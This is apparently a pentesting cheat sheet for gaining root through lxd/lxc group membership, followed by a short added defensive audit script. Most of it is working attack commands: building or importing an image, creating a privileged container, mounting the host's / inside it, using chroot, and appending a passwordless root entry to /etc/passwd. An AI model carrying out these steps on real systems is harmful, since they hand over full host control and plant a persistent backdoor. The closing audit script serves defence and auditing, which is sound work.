Members of the lxd or lxc group can escalate privileges to root by abusing container functionality. Privileged containers (security.privileged=true) interact with the host filesystem as root, allowing full system access when the host root is mounted inside the container.
Before exploiting, check if container images already exist on the target system:
# Look for 'lxd' or 'lxc' in the output
id
# Quick check in root directory
ls / | grep -iE 'image|container|tar'
# Deep scan for compressed images
find / -iname '*.tar*' 2>/dev/null
Look for files like alpine.tar.gz, ubuntu-template.tar.xz, etc.
If you found an existing container image (e.g., ubuntu-template.tar.xz):
# Import the existing image
lxc image import [ubuntu-template.tar.xz] --alias ubuntutemp
# Verify import
lxc image list
# Create privileged container
lxc init ubuntutemp privesc -c security.privileged=true #if errors, use: lxd init
# Mount host filesystem
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
# Start and access container
lxc start privesc
lxc exec privesc /bin/bash # or /bin/sh if bash unavailable
# Navigate to host root
cd /mnt/root/root && id
---
# Become real root on the host
chroot /mnt/root /bin/bash
# another way
echo 'root::0:0:root:/root:/bin/bash' >> /mnt/root/etc/passwd
On your attacking machine, install distrobuilder:
sudo su
# Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
# Clone and build distrobuilder
git clone https://github.com/lxc/distrobuilder
cd distrobuilder
make
# Prepare Alpine build directory
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
# Build the container image (if errored, check release version)
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18
Transfer files to target, then import on the target machine:
# Import image (must be done from user's HOME directory)
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
# Verify import
lxc image list
# Create privileged container
lxc init alpine privesc -c security.privileged=true #if errors, use: lxd init
# Mount host filesystem
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
# Start and access
lxc start privesc
lxc exec privesc /bin/sh
cd /mnt/root # Host filesystem mounted here
Using the automated Alpine builder:
# Build Alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
# Import (must be from HOME directory)
lxc image import ./alpine*.tar.gz --alias myimage
# Initialize LXD storage if needed
lxd init
# Create and configure container
lxc init myimage mycontainer -c security.privileged=true #if errors, use: lxd init
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# Start and access
lxc start mycontainer
lxc exec mycontainer /bin/sh
Once inside the privileged container:
cd /mnt/root/root
id # Verify you're root
chroot /mnt/root /bin/bash
echo 'root::0:0:root:/root:/bin/bash' >> /mnt/root/etc/passwd
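From the defender's side, the two preconditions this page relies on (a non-root account in the lxd or lxc group, and a container with security.privileged=true plus a disk device whose source is /) can be audited directly. The script below is an added example, not part of the original page; the function names, the svc-build account and the sample group and config text are constructed for illustration.

```shell
#!/bin/sh
# Added audit example; not from the original page. All sample data is constructed.

# Print "group:user" for each non-root member of the lxd/lxc groups, reading
# group(5)-format lines on stdin. Live use: getent group lxd lxc | lxd_group_members
# Limitation: a user whose primary GID is lxd does not appear in this field.
lxd_group_members() {
  awk -F: '$1 == "lxd" || $1 == "lxc" {
    n = split($4, m, ",")
    for (i = 1; i <= n; i++) if (m[i] != "" && m[i] != "root") print $1 ":" m[i]
  }'
}

# Read the YAML printed by `lxc config show NAME --expanded` on stdin and print:
#   privileged         security.privileged is true
#   hostroot:DEVICE    a disk device whose source is the host /
audit_container_config() {
  awk '
    /^[^ ]/ { section = $1 }    # top-level key such as "config:" or "devices:"
    section == "config:" && $1 == "security.privileged:" {
      v = $2; gsub(/"/, "", v); if (v == "true") print "privileged"
    }
    section == "devices:" && /^  [^ ]/ { dev = $1; sub(/:$/, "", dev) }
    section == "devices:" && /^    source: / { v = $2; gsub(/"/, "", v); src[dev] = v }
    section == "devices:" && /^    type: /   { typ[dev] = $2 }
    END { for (d in src) if (src[d] == "/" && typ[d] == "disk") print "hostroot:" d }
  '
}

# Constructed sample input: one service account in the lxd group, and one
# container configured the way the steps above leave it.
SAMPLE_GROUP='root:x:0:
lxd:x:110:root,svc-build
lxc:x:111:
sudo:x:27:admin'

SAMPLE_CONFIG='architecture: x86_64
config:
  image.os: Alpine
  security.privileged: "true"
devices:
  host-root:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false'

printf '%s\n' "$SAMPLE_GROUP" | lxd_group_members
printf '%s\n' "$SAMPLE_CONFIG" | audit_container_config
```

Any account the first function reports should be treated as root-equivalent on that host, and any container reporting both findings has the host filesystem writable from inside it.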